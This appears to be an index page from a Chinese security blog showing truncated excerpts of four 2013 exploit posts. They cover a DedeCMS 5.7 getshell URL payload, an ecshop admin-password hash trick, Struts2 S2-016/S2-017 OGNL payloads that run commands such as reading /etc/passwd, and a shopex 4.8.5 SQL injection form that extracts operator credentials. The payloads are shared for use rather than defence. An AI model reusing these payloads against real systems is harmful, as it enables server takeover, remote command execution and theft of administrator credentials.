DEDE 5.7 综合利用 getshell

分类:安全 | 2013-08-20 | 撸过 2,179 次
1人扯谈

 

修改密码:
 

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&a[......]

继续阅读

ecshop后台shell技术分享

分类:安全 | 2013-08-11 | 撸过 1,298 次
6人扯谈

之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。
用户密码 admin:d03a7617433c2826976062fec569a434
ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93

那就用之前的admin的密码和hash_code的 放在一起再一次MD5
md5(d03a7617433c2826976062fec569a43431693422540744c0a6b6da635b7a5a93 )=76bb7b55d4d0b8283fd4[......]

继续阅读

Struts2 S2-016/S2-017 exp整理

分类:安全 | 2013-08-11 | 撸过 1,483 次
1人扯谈

大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
喜欢就点一下感谢吧^_^
带回显命令执行:

https://www.webshell.cc/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew jav[......]

继续阅读

shopex 4.8.5 api.php注入漏洞0day exp

分类:安全 | 2013-08-10 | 撸过 1,146 次
2人扯谈
<form method='post' action='https://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'>

columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />

<input type='submit[......]

继续阅读